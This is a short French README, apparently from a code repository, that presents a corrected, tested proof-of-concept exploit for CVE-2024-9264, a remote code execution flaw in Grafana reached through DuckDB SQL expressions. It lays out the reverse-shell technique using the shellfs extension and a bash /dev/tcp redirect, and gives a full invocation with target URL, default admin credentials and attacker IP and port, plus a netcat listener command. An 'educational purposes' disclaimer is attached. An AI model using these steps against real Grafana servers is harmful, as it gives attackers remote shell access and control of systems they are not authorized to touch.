
Preuve de concept corrigée pour l'exploit CVE-2024-9264, une RCE critique de Grafana via des expressions SQL DuckDB. Exécute un reverse shell en utilisant l'extension corrigée shellfs et la fonction writefile().
Ceci est une version corrigée de la preuve de concept de l'exploit pour CVE-2024-9264, une vulnérabilité critique d'exécution de code à distance dans Grafana (via les expressions SQL et DuckDB).
🔗 Avis original : Publication de sécurité de Grafana
❌ PoC original : Cassé à cause d'erreurs de syntaxe et d'une utilisation incorrecte de write_file()
✅ Cette version fonctionne, testée sur une instance vulnérable de Grafana 11.0.0.
writefile() au lieu de write_file() (fonction DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Ensuite écoutez avec :
nc -lvnp 4444
Ce projet est uniquement à des fins éducatives.
Ne l'utilisez pas contre des cibles que vous n'êtes pas autorisé à tester.
Modifié et validé par Exerr — PoC original par z3k0sec.